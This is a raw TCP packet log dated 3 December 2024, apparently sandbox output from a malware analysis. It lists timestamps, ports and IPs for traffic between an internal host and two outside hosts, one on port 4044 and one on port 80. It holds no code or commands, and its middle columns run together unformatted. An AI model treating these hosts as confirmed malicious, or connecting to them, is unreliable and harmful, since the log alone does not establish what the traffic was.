Dec 3, 2024 14:01:47.813831091 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.814563990 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.814630985 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.814697027 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.815653086 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:47.815694094 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:47.815762043 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:48.069122076 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:52.726435900 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:52.846432924 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:52.846499920 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:52.846601963 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:52.966613054 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.979757071 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.979825020 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.979839087 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.979898930 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:53.980019093 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980031967 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980043888 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980057001 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980072021 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:53.980108023 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:53.980264902 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980277061 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980290890 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:53.980324030 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.099817991 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.099872112 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.099960089 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.181050062 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.181220055 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.181294918 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.185182095 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.185244083 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.186225891 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.194895983 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.195099115 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.195149899 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.202749968 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.202768087 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.202826977 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.210429907 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.210464001 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.210531950 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.219010115 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.219028950 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.219082117 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.229281902 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.229298115 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.229370117 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.236898899 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.237051964 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.237129927 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.244086981 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.244179964 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.244301081 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.253730059 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.253853083 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.253938913 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.260973930 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.261008024 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.261107922 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.323941946 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:54.382782936 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.383270025 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.383351088 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.386921883 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.386939049 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.386990070 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.391827106 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.391987085 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.392400026 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.396965027 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.396991014 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.397043943 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.402056932 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.402205944 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.402261019 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.407193899 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.407326937 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.408354044 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.412302971 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.412436962 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.412503004 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.417495012 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.417577982 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.417638063 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.423151016 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.423288107 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.423343897 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.427683115 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.427839041 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.427896023 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.432763100 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.432895899 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.432954073 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.437928915 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.438086987 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.438150883 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.443088055 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.443242073 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.444277048 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.445291996 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:54.445446014 CET  4044         49179      31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:54.445523024 CET  49179        4044       192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:54.448108912 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.448263884 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.448600054 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.453346014 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.453525066 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.453588963 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.459115028 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.459279060 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.459346056 CET  49181        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.463593960 CET  80           49181      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.463615894 CET  80           49181      142.93.65.161  192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.463665009 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.468663931 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.468811035 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.468859911 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.473984957 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.474160910 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.474239111 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.479017973 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.479032040 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.479084015 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.484100103 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.484406948 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.484831095 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.504494905 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.565570116 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.565582991 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.565596104 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.565660000 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:54.565660000 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:54.565833092 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.568290949 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:54.583507061 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.583555937 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.583622932 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.585501909 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.585599899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.585661888 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.588897943 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.588972092 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.589023113 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.593123913 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.593245983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.593305111 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.597419024 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.597481966 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.597544909 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.601672888 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.601686954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.601747036 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.605561018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.605673075 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.608407974 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.609518051 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.609570980 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.609656096 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.613280058 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.613406897 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.613472939 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.617082119 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.617094994 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.617198944 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.620713949 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.620774984 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.620835066 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.624341965 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.624483109 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.624545097 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.628093004 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.628285885 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.628355026 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.631758928 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.631822109 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.631886959 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.635160923 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.635456085 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.635548115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.635642052 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.639157057 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.639290094 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.640269041 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.642878056 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.643009901 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.643059969 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.646558046 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.646711111 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.646760941 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.650393963 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.650428057 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.650476933 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.653995991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.654135942 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.654192924 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.657706976 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.657800913 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.657851934 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.661380053 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.661451101 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.661499023 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.665086985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.665153027 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.665843010 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.668834925 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.668891907 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.668932915 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.672647953 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.672672987 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.672761917 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.676146030 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.676255941 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.676295996 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.685755968 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.685766935 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.685839891 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:54.685898066 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.685961962 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.686089039 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.686106920 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.688402891 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.688563108 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.688810110 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:54.703636885 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.703819036 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.703879118 CET4918180192.168.2.22142.93.65.161
Dec 3, 2024 14:01:54.705508947 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.705614090 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.705792904 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.784466028 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.784559965 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.784637928 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.785794973 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.785907984 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.785957098 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.788604021 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.788723946 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.788804054 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.791388035 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.791505098 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.791551113 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.794112921 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.794220924 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.794261932 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.796807051 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.796864986 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.796905041 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.799518108 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.799602032 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.799664021 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.802134991 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.802369118 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.802412987 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.804697037 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.804792881 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.804848909 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.805897951 CET    4044   49179  31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:54.805994034 CET    4044   49179  31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:54.806003094 CET    4044   49179  31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:54.807158947 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.807286978 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.807333946 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.809066057 CET    4044   49179  31.13.224.72   192.168.2.22
Dec 3, 2024 14:01:54.809117079 CET    49179  4044   192.168.2.22   31.13.224.72
Dec 3, 2024 14:01:54.809783936 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.809798956 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.809833050 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.812283039 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.812376976 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.812426090 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.814858913 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.815031052 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.815073967 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.817423105 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.817667961 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.817723989 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.819935083 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.820029974 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.820072889 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.822516918 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.823139906 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.823182106 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.825052977 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.825136900 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.825193882 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.827606916 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.827701092 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.827748060 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.830230951 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.830513000 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.830560923 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.831835985 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.831888914 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.831934929 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.833414078 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.833498001 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.833544016 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.835005045 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.835068941 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.835112095 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.836566925 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.836610079 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.836653948 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.838165045 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.838254929 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.838296890 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.839721918 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.839808941 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.839852095 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.841296911 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.841418028 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.841463089 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.842883110 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.842926025 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.842973948 CET    49181  80     192.168.2.22   142.93.65.161
